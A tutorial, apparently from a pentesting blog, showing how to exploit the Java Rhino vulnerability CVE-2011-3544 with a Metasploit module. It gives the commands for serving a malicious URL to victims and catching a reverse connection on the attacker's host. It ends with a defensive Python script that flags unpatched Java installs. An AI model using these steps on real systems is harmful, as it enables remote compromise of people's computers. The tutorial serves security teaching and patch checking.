Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows 7 SP1, Linux Debian 6
Exploit Credits : Michael Schierl, Juan Vazquez, Edward D. Teach, Sinn3r
This is a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The quote above is from zerodayinitiative.com. This exploit targets a vulnerability (CVE-2011-3544) in the Java Runtime Environment; Java 6 and Java 7 are affected. For the full list of affected Java versions, see the Oracle advisory (http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html).
1. Download the Java Rhino exploit from the link above, and then copy it into the following folder:
cp java_rhino.rb /pentest/exploits/framework/modules/exploits/multi/browser/
2. Open the Metasploit console by typing msfconsole in a terminal, then use the exploit you just added and set up the payload.
3. Next, set the module options needed for the attack to launch successfully. Once everything looks right, run exploit to start the exploit server.
set srvhost 192.168.8.93 --> attacker ip address
set srvport 80 --> attacker local port to open
set uripath java_rhino --> uripath to send to victim
set lhost 192.168.8.93 --> address for reverse connection if attack succeeds
set lport 443 --> local port to handle victim connection if attack succeeds
exploit --> run the exploit
4. The picture below is a screenshot from the victim when he/she opened the malicious URL.
5. As soon as the victim opens our malicious link, our Metasploit console gets something interesting.
Note: if you get this error:
Exception handling request: No such file or directory – /opt/framework3/msf3/data/exploits/cve-2011-3544/Exploit.class
see the first comment below for how to solve it.
6. The picture below is from my test on Debian 6 with Iceweasel.
1. Update your Java Runtime to a newer version.
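As an added example (not part of the original post), here is a Python check a defender can run to tell whether a host's installed Java is still below the fix level for this vulnerability, i.e. whether "update to a newer version" has actually happened. The fix levels in FIXED_UPDATE are taken to be Java 6 Update 29 and Java 7 Update 1 from the October 2011 Oracle Critical Patch Update linked above; they are an assumption of this example and should be checked against the advisory. The two sample `java -version` outputs are constructed so the parser can be exercised offline.

```python
import re
import subprocess

# Fix levels for CVE-2011-3544 from the October 2011 Oracle Critical Patch
# Update linked in the article. Assumed here as Java 6 Update 29 and
# Java 7 Update 1; adjust if the advisory you read states otherwise.
FIXED_UPDATE = {6: 29, 7: 1}

# Constructed sample `java -version` outputs (Java prints this to stderr).
SAMPLE_OLD = (
    'java version "1.6.0_26"\n'
    'Java(TM) SE Runtime Environment (build 1.6.0_26-b03)\n'
    'Java HotSpot(TM) 64-Bit Server VM (build 20.1-b02, mixed mode)\n'
)
SAMPLE_PATCHED = (
    'java version "1.7.0_01"\n'
    'Java(TM) SE Runtime Environment (build 1.7.0_01-b08)\n'
)

# Matches the legacy "1.<family>.0_<update>" scheme used by Java 6 and 7.
# Java 9+ prints e.g. 'openjdk version "11.0.2"', which deliberately does
# not match: those families postdate the fix and are reported as "unknown".
VERSION_RE = re.compile(r'java version "1\.(\d+)\.\d+_(\d+)')


def parse_java_version(text):
    """Return (family, update) from `java -version` output, or None if unparseable."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def assess(family, update):
    """Classify a Java 1.x family/update pair against the fix levels.

    Returns "vulnerable", "patched", or "unknown" for families the article
    and advisory do not cover.
    """
    fix = FIXED_UPDATE.get(family)
    if fix is None:
        return "unknown"
    return "vulnerable" if update < fix else "patched"


def assess_output(text):
    """Classify raw `java -version` output."""
    parsed = parse_java_version(text)
    if parsed is None:
        return "unknown"
    return assess(*parsed)


def check_installed_java():
    """Run the local `java -version` and classify it; "unknown" if java is absent."""
    try:
        proc = subprocess.run(["java", "-version"], capture_output=True, text=True)
    except FileNotFoundError:
        return "unknown"
    # `java -version` writes to stderr; fall back to stdout for unusual builds.
    return assess_output(proc.stderr or proc.stdout)


if __name__ == "__main__":
    print("local java:", check_installed_java())
```

Run it on each workstation (or feed it captured `java -version` output from an inventory tool); anything reported as "vulnerable" is a host that would still be exposed to the applet described above and needs the update applied.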